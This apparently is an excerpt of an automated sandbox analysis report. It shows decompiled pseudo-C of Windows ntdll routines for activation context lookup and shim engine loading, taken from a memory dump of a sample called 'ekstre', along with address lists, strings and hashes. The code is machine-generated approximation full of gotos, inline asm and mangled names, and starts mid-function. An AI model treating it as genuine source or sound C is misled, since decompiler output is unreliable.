												_push("RtlpFindActivationContextSection_CheckParameters");
												_push("SXS: %s() flags contains return_flags but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
												L82:
												_push(0);
												_push(0x33);
												E341FEF10();
												goto L83;
											} else {
												_t130 = _a20;
												goto L9;
											}
										}
									}
								}
							}
						}
					}
				}
				L112:
			}

0x3418a178
0x3418a17f
0x3418a182
0x3418a18f
0x3418a4b4
0x00000000
0x341d77ce
0x341d77ce
0x00000000
0x341d77ce
0x3418a195
0x3418a195
0x3418a199
0x3418a1a1
0x3418a1a9
0x3418a1b1
0x341d77f3
0x341d77f3
0x00000000
0x3418a1b7
0x3418a1b7
0x3418a1c0
0x00000000
0x3418a1c6
0x3418a1c6
0x3418a1cc
0x3418a5dc
0x00000000
0x3418a5e2
0x00000000
0x3418a5e2
0x3418a1d2
0x3418a1d4
0x00000000
0x3418a1da
0x3418a1da
0x3418a1dd
0x00000000
0x3418a1e3
0x3418a1e3
0x3418a1e6
0x3418a1fa
0x3418a1fd
0x3418a5f0
0x00000000
0x3418a5f6
0x341d77fd
0x341d7802
0x341d7807
0x00000000
0x341d7807
0x3418a203
0x3418a203
0x3418a208
0x3418a20b
0x3418a20f
0x3418a216
0x3418a21c
0x3418a224
0x3418a228
0x3418a22b
0x3418a233
0x3418a23b
0x3418a23f
0x3418a243
0x3418a247
0x3418a250
0x3418a252
0x3418a255
0x00000000
0x00000000
0x3418a25b
0x3418a263
0x3418a26f
0x3418a26f
0x3418a277
0x3418a27d
0x3418a3ae
0x3418a3ae
0x3418a3b4
0x3418a3be
0x341d7823
0x341d7826
0x00000000
0x341d782c
0x341d782c
0x00000000
0x341d782c
0x3418a3c4
0x3418a3c4
0x3418a3c9
0x00000000
0x3418a3c9
0x3418a283
0x3418a283
0x3418a288
0x00000000
0x3418a288
0x3418a265
0x3418a265
0x3418a269
0x3418a4bf
0x3418a4c2
0x3418a4c8
0x3418a4e3
0x341d780e
0x00000000
0x3418a4e9
0x3418a4ec
0x341d7819
0x00000000
0x3418a4f2
0x3418a4f2
0x00000000
0x3418a4f2
0x3418a4ec
0x3418a4ca
0x3418a4ca
0x3418a4cc
0x00000000
0x3418a4d2
0x3418a4d2
0x3418a4d2
0x3418a4d7
0x3418a28c
0x3418a28e
0x341d7833
0x341d7838
0x341d7838
0x00000000
0x3418a294
0x3418a2a5
0x3418a2ac
0x3418a3d2
0x3418a3d9
0x00000000
0x3418a3e8
0x3418a3e8
0x3418a3ec
0x3418a3f0
0x00000000
0x3418a3f0
0x3418a2b2
0x3418a2b2
0x3418a2d2
0x3418a2d6
0x3418a2d8
0x3418a2da
0x3418a2dc
0x3418a2de
0x341d783a
0x341d783c
0x00000000
0x341d7842
0x00000000
0x341d7842
0x3418a2e4
0x3418a2e4
0x3418a2e4
0x3418a2eb
0x341d78ed
0x341d78ed
0x00000000
0x3418a2f1
0x3418a2f1
0x3418a300
0x3418a300
0x3418a300
0x3418a30a
0x00000000
0x00000000
0x3418a310
0x3418a325
0x3418a32c
0x3418a4f7
0x3418a500
0x3418a502
0x3418a505
0x3418a50b
0x3418a5a5
0x3418a5b8
0x3418a5be
0x3418a5c2
0x3418a5cb
0x3418a5d1
0x3418a5d1
0x3418a5cb
0x3418a50b
0x3418a523
0x3418a549
0x3418a551
0x3418a525
0x3418a53c
0x3418a543
0x00000000
0x00000000
0x00000000
0x00000000
0x3418a543
0x3418a332
0x3418a337
0x3418a393
0x3418a399
0x3418a339
0x3418a339
0x3418a342
0x3418a344
0x3418a34a
0x3418a34e
0x3418a355
0x3418a359
0x00000000
0x3418a360
0x3418a363
0x3418a3fa
0x3418a3fc
0x341d7847
0x341d784f
0x00000000
0x341d7855
0x341d7855
0x341d7859
0x00000000
0x341d785f
0x341d785f
0x341d7862
0x341d7868
0x341d7892
0x341d7894
0x00000000
0x00000000
0x00000000
0x00000000
0x341d786a
0x341d786d
0x341d787e
0x341d788b
0x00000000
0x341d7880
0x341d7880
0x341d7885
0x341d789a
0x341d789a
0x341d789f
0x00000000
0x341d789f
0x341d786f
0x341d7873
0x341d788e
0x341d788e
0x00000000
0x341d788e
0x341d786d
0x341d7868
0x341d7859
0x3418a402
0x3418a402
0x3418a405
0x3418a554
0x3418a556
0x3418a55e
0x3418a564
0x3418a56a
0x00000000
0x3418a570
0x3418a570
0x3418a575
0x00000000
0x3418a575
0x3418a40b
0x3418a40e
0x00000000
0x3418a414
0x3418a414
0x3418a418
0x3418a420
0x3418a426
0x3418a42c
0x00000000
0x3418a432
0x3418a432
0x3418a437
0x00000000
0x3418a437
0x3418a42c
0x3418a40e
0x3418a405
0x3418a369
0x3418a369
0x3418a36c
0x341d78e3
0x00000000
0x3418a372
0x3418a372
0x3418a374
0x3418a452
0x3418a459
0x3418a57e
0x3418a585
0x00000000
0x3418a594
0x3418a594
0x3418a598
0x00000000
0x3418a598
0x3418a45f
0x3418a45f
0x3418a47f
0x3418a483
0x3418a485
0x3418a487
0x3418a489
0x3418a48b
0x00000000
0x3418a491
0x3418a493
0x341d78a8
0x341d78b1
0x341d78c3
0x341d78c3
0x341d78cb
0x00000000
0x00000000
0x341d78d6
0x341d78dc
0x00000000
0x341d78de
0x00000000
0x341d78de
0x00000000
0x341d78dc
0x341d78c3
0x341d78b1
0x3418a499
0x3418a499
0x00000000
0x3418a499
0x3418a48b
0x3418a37a
0x3418a37a
0x3418a37f
0x3418a381
0x3418a49b
0x3418a49b
0x3418a4a2
0x00000000
0x3418a4a8
0x00000000
0x3418a4a8
0x3418a387
0x3418a387
0x3418a38c
0x3418a38e
0x3418a38e
0x00000000
0x3418a38c
0x3418a381
0x3418a374
0x3418a36c
0x00000000
0x3418a363
0x3418a360
0x3418a337
0x00000000
0x3418a32c
0x341d78f1
0x341d78f1
0x341d78fc
0x341d7904
0x00000000
0x341d7904
0x3418a2eb
0x3418a2de
0x3418a2ac
0x3418a28e
0x3418a4cc
0x00000000
0x00000000
0x00000000
0x3418a269
0x00000000
0x3418a39c
0x3418a39c
0x3418a39f
0x00000000
0x3418a3a5
0x3418a3a8
0x00000000
0x00000000
0x00000000
0x00000000
0x3418a3a8
0x00000000
0x3418a39f
0x3418a250
0x3418a1e8
0x3418a1f1
0x341d77d8
0x341d77dd
0x341d77e2
0x341d77e7
0x341d77e7
0x341d77e9
0x341d77eb
0x00000000
0x3418a1f7
0x3418a1f7
0x00000000
0x3418a1f7
0x3418a1f1
0x3418a1e6
0x3418a1dd
0x3418a1d4
0x3418a1cc
0x3418a1c0
0x3418a1b1
0x00000000

Strings

SsHd, xrefs: 3418A304
SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 341D7807
RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 341D78F3
RtlpFindActivationContextSection_CheckParameters, xrefs: 341D77DD, 341D7802
SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 341D77E2
Actx , xrefs: 341D7819, 341D7880

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
API String ID: 0-1988757188
Opcode ID: 315901c5177fc55172254e10707caf51ee9a72bb43728e4c78ca06cf843380f8
Instruction ID: 02fcd3f2b3801f2c3c4977737b7178c6dbbe9745f1c06e8b23037be85ecfc353
Opcode Fuzzy Hash: 315901c5177fc55172254e10707caf51ee9a72bb43728e4c78ca06cf843380f8
Instruction Fuzzy Hash: F4E1EFB5604B018FE710CE24C8D4B2AB7E5FB853A4F554AADF9A5CB290DB31D885CF81

Uniqueness

Uniqueness Score: -1.00%

Function 3418D690 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372
timeCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E3418D690(signed int _a4, signed int _a8, intOrPtr _a12, signed int _a16, intOrPtr* _a20) {
				signed int _v8;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				char _v56;
				char _v60;
				signed int _v64;
				intOrPtr _v68;
				signed int _v72;
				char _v76;
				signed int _v80;
				signed int* _v84;
				char _v88;
				signed int _v92;
				char _v93;
				signed int _v104;
				char _v117;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t150;
				char _t158;
				intOrPtr _t160;
				intOrPtr _t163;
				intOrPtr* _t164;
				intOrPtr _t170;
				signed int _t171;
				void* _t172;
				signed int _t195;
				intOrPtr* _t201;
				signed int _t205;
				intOrPtr* _t209;
				void* _t210;
				intOrPtr _t211;
				intOrPtr _t213;
				signed int _t214;
				intOrPtr* _t215;
				intOrPtr _t217;
				intOrPtr _t225;
				intOrPtr _t227;
				intOrPtr _t228;
				void* _t233;
				intOrPtr* _t234;
				signed int _t242;
				void* _t246;
				signed int _t247;
				signed int _t252;
				void* _t253;
				intOrPtr* _t254;
				intOrPtr _t255;
				signed int _t256;
				signed int _t258;

				_t258 = (_t256 & 0xfffffff8) - 0x5c;
				_v8 =  *0x3426b370 ^ _t258;
				_t217 =  *[fs:0x18];
				_t241 = _a16;
				_t209 = _a20;
				_t150 =  *((intOrPtr*)(_t217 + 0x30));
				_t252 = _a8;
				_v84 = _t241;
				_v80 = _t209;
				if( *((intOrPtr*)(_t150 + 0x1f8)) == 0) {
					if( *((intOrPtr*)(_t150 + 0x200)) != 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t217 + 0x1a8)))) != 0) {
						goto L1;
					} else {
						_t151 = 0xc0150001;
						L24:
						_pop(_t246);
						_pop(_t253);
						_pop(_t210);
						return L341B4B50(_t151, _t210, _v8 ^ _t258, _t241, _t246, _t253);
					}
				}
				L1:
				_v88 = 0;
				if(_t241 == 0) {
					L49:
					_t151 = 0xc000000d;
					goto L24;
				}
				_t241 = _a4;
				if((_t241 & 0xfffffff8) != 0) {
					goto L49;
				}
				if((_t241 & 0x00000007) == 0) {
					if(_t209 != 0) {
						L5:
						if( *_t209 < 0x24) {
							goto L49;
						}
						L6:
						if((_t241 & 0x00000002) != 0) {
							if(_t209 + 0x2c <=  *_t209 + _t209) {
								goto L7;
							}
							_push(0xc000000d);
							_push("RtlpFindActivationContextSection_CheckParameters");
							_push("SXS: %s() flags contains return_flags but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
							L48:
							_push(0);
							_push(0x33);
							E341FEF10();
							_t258 = _t258 + 0x14;
							goto L49;
						}
						L7:
						if((_t241 & 0x00000004) != 0) {
							if(_t209 + 0x40 <=  *_t209 + _t209) {
								goto L8;
							}
							_push(0xc000000d);
							_push("RtlpFindActivationContextSection_CheckParameters");
							_push("SXS: %s() flags contains return_assembly_metadata but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
							goto L48;
						}
						L8:
						_t241 =  &_v76;
						_v48 = _a12;
						_v60 = 0x18;
						_v56 = 0;
						_v52 = _t252;
						_v40 = 0;
						_v64 = 0;
						_v44 = 0;
						if(E3418D580( &_v60,  &_v76,  &_v88,  &_v64) < 0) {
							goto L24;
						}
						_t151 = 0;
						if(0 < 0) {
							goto L24;
						}
						_t158 = _v88;
						if(_t158 < 0x28) {
							L34:
							_t254 = _v76;
							L91:
							_push(_t158);
							E341FEF10(0x33, 0, "RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section\n", _t254);
							_t258 = _t258 + 0x14;
							_t151 = 0xc0150003;
							goto L24;
						}
						_t247 = _v64;
						while(1) {
							L12:
							_t254 = _v76;
							if( *_t254 != 0x64487347) {
								goto L91;
							}
							_t211 =  *((intOrPtr*)(_t254 + 0x14));
							_t160 = 1;
							if(_t211 == 0) {
								L19:
								_t225 =  *[fs:0x18];
								_t255 = _v44;
								_v92 = 0;
								_t247 = 0;
								_v68 = _t225;
								_t241 =  *(_t225 + 0x30);
								_v72 = _t241;
								L20:
								while(1) {
									if(_t255 <= 2) {
										_t163 = _t255;
										if(_t163 == 0) {
											_t164 =  *((intOrPtr*)(_t225 + 0x1a8));
											if(_t164 == 0) {
												L43:
												_t213 =  *((intOrPtr*)(_t241 + 0x1f8));
												_v92 = 0;
												if(_t213 == 0) {
													L28:
													_t213 =  *((intOrPtr*)(_t241 + 0x200));
													_v92 = 0xfffffffc;
													if(_t213 == 0) {
														goto L21;
													}
													_t255 = 3;
													_v44 = 3;
													L22:
													if(_t213 != 0) {
														_t241 = _v52;
														_t151 = E3418A600(_t213, _v52, _v48,  &_v76,  &_v88);
														if(_t151 < 0) {
															if(_t151 != 0xc0150001 || _t255 == 3) {
																L32:
																if(_t151 < 0) {
																	if(_t151 != 0xc0150001) {
																		goto L24;
																	}
																	goto L23;
																}
																_t158 = _v88;
																if(_t158 >= 0x28) {
																	goto L12;
																}
																goto L34;
															} else {
																_t225 = _v68;
																_t241 = _v72;
																continue;
															}
														}
														_t241 = _v92;
														_v40 = (0 | _t241 != 0xfffffffc) - 0x00000001 & 0x00000002 | 0 | _t241 == 0x00000000;
														asm("sbb edi, edi");
														_t247 =  ~(_t241 - 0xfffffffc) & _t241;
														_t151 = 0;
														goto L32;
													}
													L23:
													_t151 = 0xc0150008;
													goto L24;
												}
												_t255 = 2;
												_v44 = 2;
												goto L22;
											}
											_t170 =  *_t164;
											if(_t170 == 0) {
												goto L43;
											}
											_t171 =  *((intOrPtr*)(_t170 + 4));
											_v92 = _t171;
											if(_t171 == 0) {
												L83:
												if(_t213 == 0) {
													goto L43;
												}
												L84:
												_t255 = 1;
												_v44 = 1;
												goto L22;
											}
											if(_t171 != 0xfffffffc) {
												if(_t171 != 0xfffffffd) {
													_t213 =  *((intOrPtr*)(_t171 + 0x10));
													goto L83;
												}
												_t213 = "Actx ";
												goto L84;
											}
											_t213 =  *((intOrPtr*)(_t241 + 0x200));
											goto L83;
										}
										_t172 = _t163 - 1;
										if(_t172 == 0) {
											goto L43;
										}
										if(_t172 != 1) {
											goto L21;
										}
										goto L28;
									}
									L21:
									if(_t255 > 3) {
										_t151 = 0xc00000e5;
										goto L24;
									}
									goto L22;
								}
							}
							if( *((intOrPtr*)(_t254 + 8)) != 1) {
								_t160 = 0;
							}
							_t227 =  *((intOrPtr*)(_t254 + 0x1c));
							if(_t227 != 0) {
								if(_t160 == 0) {
									goto L16;
								}
								_v92 = 0;
								_t233 =  *((intOrPtr*)(_t227 + _t254 + 4)) +  *_v84 %  *(_t227 + _t254) * 8;
								_t234 = _t233 + _t254;
								_t201 =  *((intOrPtr*)(_t233 + _t254 + 4)) + _t254;
								_v72 = _t234;
								if( *_t234 <= 0) {
									goto L19;
								} else {
									goto L54;
								}
								while(1) {
									L54:
									_t214 =  *_t201 + _t254;
									_v68 = _t201 + 4;
									if(E341C8050(_t214, _v84, 0x10) == 0x10) {
										goto L18;
									}
									_t205 = _v92 + 1;
									_v92 = _t205;
									_t201 = _v68;
									if(_t205 <  *_v72) {
										continue;
									}
									goto L19;
								}
							} else {
								L16:
								_t228 =  *((intOrPtr*)(_t254 + 0x18));
								if(( *(_t254 + 0x10) & 0x00000001) == 0) {
									_t174 = _t228 + _t254;
									_v92 = _t228 + _t254;
									while(E341C8050(_t174, _v84, 0x10) != 0x10) {
										_t174 = _v92 + 0x1c;
										_v92 = _v92 + 0x1c;
										_t211 = _t211 - 1;
										if(_t211 != 0) {
											continue;
										}
										goto L19;
									}
									_t214 = _v92;
									L18:
									if(_t214 != 0) {
										if( *((intOrPtr*)(_t214 + 0x10)) == 0) {
											goto L19;
										}
										_t241 = _v80;
										if(_t241 != 0) {
											 *((intOrPtr*)(_t241 + 4)) =  *((intOrPtr*)(_t254 + 0xc));
											 *((intOrPtr*)(_t241 + 8)) =  *((intOrPtr*)(_t214 + 0x10)) + _t254;
											 *((intOrPtr*)(_t241 + 0xc)) =  *((intOrPtr*)(_t214 + 0x14));
											if(_t241 + 0x28 <=  *_t241 + _t241) {
												 *((intOrPtr*)(_t241 + 0x24)) =  *((intOrPtr*)(_t214 + 0x18));
											}
										}
										if((_t247 - 0x00000001 | 0x00000007) != 0xffffffff) {
											_t215 =  *((intOrPtr*)(_t247 + 0x14));
											if(_t215 != 0 && (( *(_t247 + 0x1c) & 0x00000008) == 0 || ( *(_t247 + 0x3c) & 0x00000008) == 0)) {
												_v93 = 0;
												 *0x342691e0(3, _t247,  *((intOrPtr*)(_t247 + 0x10)),  *((intOrPtr*)(_t247 + 0x18)), 0,  &_v93);
												 *_t215();
												 *(_t247 + 0x1c) =  *(_t247 + 0x1c) | 0x00000008;
												_t241 = _v104;
												if(_v117 != 0) {
													 *(_t247 + 0x3c) =  *(_t247 + 0x3c) | 0x00000008;
												}
											}
										}
										if(_t241 == 0 || E34174428(_a4, _t241, _t247,  &_v60, _t254,  *((intOrPtr*)(_t254 + 0x20)),  *((intOrPtr*)(_t254 + 0x24)), _v88) >= 0) {
											_t151 = 0;
										}
										goto L24;
									}
									goto L19;
								}
								_t242 = _v84;
								_v36 =  *_t242;
								_v32 =  *((intOrPtr*)(_t242 + 4));
								_v28 =  *((intOrPtr*)(_t242 + 8));
								_v24 =  *((intOrPtr*)(_t242 + 0xc));
								_t195 = E341B8170( &_v36, _t228 + _t254, _t211, "true", E3416B600);
								_t258 = _t258 + 0x14;
								_t214 = _t195;
							}
							goto L18;
						}
						goto L91;
					}
					goto L6;
				}
				if(_t209 == 0) {
					goto L49;
				}
				goto L5;
			}

0x3418d698
0x3418d6a2
0x3418d6a6
0x3418d6ad
0x3418d6b1
0x3418d6b4
0x3418d6b8
0x3418d6c3
0x3418d6c7
0x3418d6cb
0x3418d90e
0x00000000
0x341d913f
0x341d913f
0x3418d847
0x3418d84b
0x3418d84c
0x3418d84d
0x3418d858
0x3418d858
0x3418d90e
0x3418d6d1
0x3418d6d1
0x3418d6db
0x341d9164
0x341d9164
0x00000000
0x341d9164
0x3418d6e1
0x3418d6ea
0x00000000
0x00000000
0x3418d6f3
0x3418d8fc
0x3418d701
0x3418d704
0x00000000
0x00000000
0x3418d70a
0x3418d70d
0x3418d922
0x00000000
0x00000000
0x341d9149
0x341d914e
0x341d9153
0x341d9158
0x341d9158
0x341d915a
0x341d915c
0x341d9161
0x00000000
0x341d9161
0x3418d713
0x3418d716
0x3418d936
0x00000000
0x00000000
0x341d916e
0x341d9173
0x341d9178
0x00000000
0x341d9178
0x3418d71c
0x3418d71f
0x3418d723
0x3418d72f
0x3418d73c
0x3418d745
0x3418d749
0x3418d751
0x3418d759
0x3418d768
0x00000000
0x00000000
0x3418d76e
0x3418d772
0x00000000
0x00000000
0x3418d778
0x3418d77f
0x3418d8f1
0x3418d8f1
0x341d9370
0x341d9370
0x341d937b
0x341d9380
0x341d9383
0x00000000
0x341d9383
0x3418d785
0x3418d790
0x3418d790
0x3418d790
0x3418d79a
0x00000000
0x00000000
0x3418d7a0
0x3418d7a3
0x3418d7a7
0x3418d80d
0x3418d80d
0x3418d816
0x3418d81c
0x3418d820
0x3418d822
0x3418d826
0x3418d829
0x00000000
0x3418d830
0x3418d833
0x3418d85d
0x3418d860
0x341d92e0
0x341d92e8
0x3418d941
0x3418d941
0x3418d949
0x3418d94f
0x3418d874
0x3418d874
0x3418d87a
0x3418d884
0x00000000
0x00000000
0x3418d886
0x3418d88b
0x3418d83e
0x3418d840
0x3418d891
0x3418d8a5
0x3418d8ac
0x341d933a
0x3418d8dc
0x3418d8de
0x341d935b
0x00000000
0x00000000
0x00000000
0x341d9361
0x3418d8e4
0x3418d8eb
0x00000000
0x00000000
0x00000000
0x341d9349
0x341d9349
0x341d934d
0x00000000
0x341d934d
0x341d933a
0x3418d8b2
0x3418d8d2
0x3418d8d6
0x3418d8d8
0x3418d8da
0x00000000
0x3418d8da
0x3418d842
0x3418d842
0x00000000
0x3418d842
0x3418d955
0x3418d95a
0x00000000
0x3418d95a
0x341d92ee
0x341d92f2
0x00000000
0x00000000
0x341d92f8
0x341d92fb
0x341d9301
0x341d931f
0x341d9321
0x00000000
0x00000000
0x341d9327
0x341d9327
0x341d932c
0x00000000
0x341d932c
0x341d9306
0x341d9313
0x341d931c
0x00000000
0x341d931c
0x341d9315
0x00000000
0x341d9315
0x341d9308
0x00000000
0x341d9308
0x3418d866
0x3418d869
0x00000000
0x00000000
0x3418d872
0x00000000
0x00000000
0x00000000
0x3418d872
0x3418d835
0x3418d838
0x341d9366
0x00000000
0x341d9366
0x00000000
0x3418d838
0x3418d830
0x3418d7ad
0x341d917f
0x341d917f
0x3418d7b3
0x3418d7b8
0x341d9188
0x00000000
0x00000000
0x341d9194
0x341d91a5
0x341d91ac
0x341d91ae
0x341d91b0
0x341d91b7
0x00000000
0x00000000
0x00000000
0x00000000
0x341d91bd
0x341d91bd
0x341d91c8
0x341d91ca
0x341d91d7
0x00000000
0x00000000
0x341d91e5
0x341d91e6
0x341d91ec
0x341d91f0
0x00000000
0x00000000
0x00000000
0x341d91f2
0x3418d7be
0x3418d7be
0x3418d7c2
0x3418d7c5
0x341d91f7
0x341d91fa
0x341d91fe
0x341d9213
0x341d9216
0x341d921a
0x341d921d
0x00000000
0x00000000
0x00000000
0x341d921f
0x341d9224
0x3418d805
0x3418d807
0x341d9231
0x00000000
0x00000000
0x341d9237
0x341d923d
0x341d9244
0x341d924e
0x341d9254
0x341d925c
0x341d9261
0x341d9261
0x341d925c
0x341d926d
0x341d926f
0x341d9274
0x341d9286
0x341d9299
0x341d929f
0x341d92a1
0x341d92aa
0x341d92ae
0x341d92b0
0x341d92b0
0x341d92ae
0x341d9274
0x341d92b6
0x341d92d9
0x341d92d9
0x00000000
0x341d92b6
0x00000000
0x3418d807
0x3418d7cb
0x3418d7d9
0x3418d7e0
0x3418d7e7
0x3418d7ee
0x3418d7fb
0x3418d800
0x3418d803
0x3418d803
0x00000000
0x3418d7b8
0x00000000
0x3418d790
0x00000000
0x3418d902
0x3418d6fb
0x00000000
0x00000000
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 341D9299

Strings

SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 341D9178
GsHd, xrefs: 3418D794
RtlpFindActivationContextSection_CheckParameters, xrefs: 341D914E, 341D9173
SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 341D9153
Actx , xrefs: 341D9315
RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 341D9372

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
API String ID: 3446177414-2196497285
Opcode ID: 673bf22f6c7f1cee8de08244636a8272f80210c1234dc1f6e450c9d3397d3281
Instruction ID: 1b1d8ff49bc58f4c65c43a6faa43dd2913d61cfed901246278ca4fb0d1eeb96e
Opcode Fuzzy Hash: 673bf22f6c7f1cee8de08244636a8272f80210c1234dc1f6e450c9d3397d3281
Instruction Fuzzy Hash: 81E1CFB5604B06DFE710CF24C8C0B5AB7E5BF8A358F404AADE8959B291D771E844CF92

Uniqueness

Uniqueness Score: -1.00%

Function 34166565 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184
timeCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E34166565(intOrPtr* __ecx) {
				signed int _v8;
				char _v16;
				char _v92;
				char _v93;
				char _v100;
				signed short _v106;
				char _v108;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t56;
				signed char _t67;
				intOrPtr _t76;
				signed char _t81;
				signed int _t86;
				signed int _t87;
				char _t88;
				intOrPtr _t103;
				signed int _t106;
				intOrPtr* _t110;
				signed int _t111;
				signed int _t112;
				intOrPtr _t113;
				signed int _t114;
				intOrPtr* _t116;
				signed int _t117;
				void* _t118;

				_v8 =  *0x3426b370 ^ _t117;
				_v93 = 1;
				_t110 = __ecx;
				L3418E8A6(0, 0x4001,  &_v92);
				_t106 =  *0x7ffe0330;
				_t86 =  *0x34269200; // 0x0
				_t113 = 0x20;
				 *0x342665f8 = 1;
				_t92 = _t113 - (_t106 & 0x0000001f);
				asm("ror ebx, cl");
				_t87 = _t86 ^ _t106;
				if( *__ecx == 0) {
					L8:
					_t88 = _v93;
					L9:
					if(_v16 != 0) {
						E3419E7E0(_t92, _v92);
					}
					_t114 =  *0x34269210; // 0x0
					asm("ror esi, cl");
					 *0x342691e0();
					 *(_t114 ^  *0x7ffe0330)();
					_t108 =  *0x7ffe0330;
					_t111 =  *0x34269218; // 0x0
					_push(0x20);
					asm("ror edi, cl");
					_t112 = _t111 ^  *0x7ffe0330;
					E3417FED0(0x342632d8);
					_t98 = 0x34265d8c;
					if( *0x342665f0 != 0) {
						_t56 =  *0x34265d8c; // 0x3f22cc8
						while(1) {
							__eflags = _t56 - _t98;
							if(_t56 == _t98) {
								break;
							}
							_v100 = _t56;
							_t39 = _t56 + 0x35;
							 *_t39 =  *(_t56 + 0x35) & 0x000000f7;
							__eflags =  *_t39;
							_t56 =  *_t56;
						}
						goto L11;
					} else {
						L11:
						_t116 =  *0x34265d8c; // 0x3f22cc8
						if( *0x342665f4 < 2) {
							_t116 =  *_t116;
						}
						if(_t116 == _t98) {
							L15:
							 *0x342665f0 = 1;
							 *0x342665f8 = 0;
							E3417E740(_t98);
							E3416676F(_t98);
							return L341B4B50(_t88, _t88, _v8 ^ _t117, _t108, _t112, _t116, 0x342632d8);
						} else {
							do {
								_v100 = _t116;
								_t108 = _t112;
								_t24 = _t116 + 0x50; // 0x3f22c90
								_t98 =  *_t24;
								E34166704( *_t24, _t112);
								_t116 =  *_t116;
							} while (_t116 != 0x34265d8c);
							goto L15;
						}
					}
				} else {
					goto L1;
				}
				do {
					L1:
					E341B5050(_t92,  &_v108, _t110);
					_t92 = L34166B45( &_v108,  &_v92, "true",  &_v100);
					if(_t92 < 0) {
						_t67 =  *0x342637c0; // 0x0
						__eflags = _t67 & 0x00000003;
						if((_t67 & 0x00000003) != 0) {
							_push(_t92);
							E341EE692("minkernel\\ntdll\\ldrinit.c", 0x8ef, "LdrpLoadShimEngine", 0, "Loading the shim DLL \"%wZ\" failed with status 0x%08lx\n",  &_v108);
							_t67 =  *0x342637c0; // 0x0
							_t118 = _t118 + 0x1c;
						}
						__eflags = _t67 & 0x00000010;
						if((_t67 & 0x00000010) != 0) {
							asm("int3");
						}
						_v93 = 0;
						goto L6;
					}
					 *(_v100 + 0x34) =  *(_v100 + 0x34) | 0x00000100;
					E341A7DF6(_v100);
					_t76 = _v100;
					_t103 =  *((intOrPtr*)(_t76 + 0x50));
					_t122 =  *((intOrPtr*)(_t103 + 0x20)) - 7;
					if( *((intOrPtr*)(_t103 + 0x20)) != 7) {
						L5:
						 *0x342691e0( *((intOrPtr*)(_t76 + 0x18)));
						 *_t87();
						_t92 = _v100;
						E3418D3E1(_t87, _v100, _t113);
						goto L6;
					}
					_t113 = E341916EE(_t87, _t103, _t110, _t113, _t122);
					if(_t113 < 0) {
						_t81 =  *0x342637c0; // 0x0
						_t88 = 0;
						__eflags = _t81 & 0x00000003;
						if((_t81 & 0x00000003) != 0) {
							_push(_t113);
							E341EE692("minkernel\\ntdll\\ldrinit.c", 0x909, "LdrpLoadShimEngine", 0, "Initializing the shim DLL \"%wZ\" failed with status 0x%08lx\n",  &_v108);
							_t81 =  *0x342637c0; // 0x0
						}
						__eflags = _t81 & 0x00000010;
						if((_t81 & 0x00000010) != 0) {
							asm("int3");
						}
						_t92 = _t113;
						E341F1D5E(_t113);
						_push(_t113);
						_push(0xffffffff);
						E341B2C70();
						_t113 = 0x20;
						goto L9;
					}
					_t76 = _v100;
					goto L5;
					L6:
					_t110 = _t110 + ((_v106 & 0x0000ffff) >> 1) * 2;
				} while ( *_t110 != 0);
				_t113 = 0x20;
				goto L8;
			}

0x34166574
0x3416657d
0x34166581
0x3416658b
0x34166590
0x34166598
0x341665a3
0x341665a6
0x341665ad
0x341665b1
0x341665b3
0x341665b8
0x34166637
0x34166637
0x3416663a
0x3416663e
0x341666fa
0x341666fa
0x3416664c
0x34166659
0x3416665f
0x34166665
0x34166667
0x3416666f
0x34166678
0x3416667d
0x34166684
0x34166686
0x34166692
0x34166697
0x341c98c3
0x341c98d3
0x341c98d3
0x341c98d5
0x00000000
0x00000000
0x341c98ca
0x341c98cd
0x341c98cd
0x341c98cd
0x341c98d1
0x341c98d1
0x00000000
0x3416669d
0x3416669d
0x341666a4
0x341666aa
0x341666ac
0x341666ac
0x341666b0
0x341666c9
0x341666cb
0x341666d7
0x341666dc
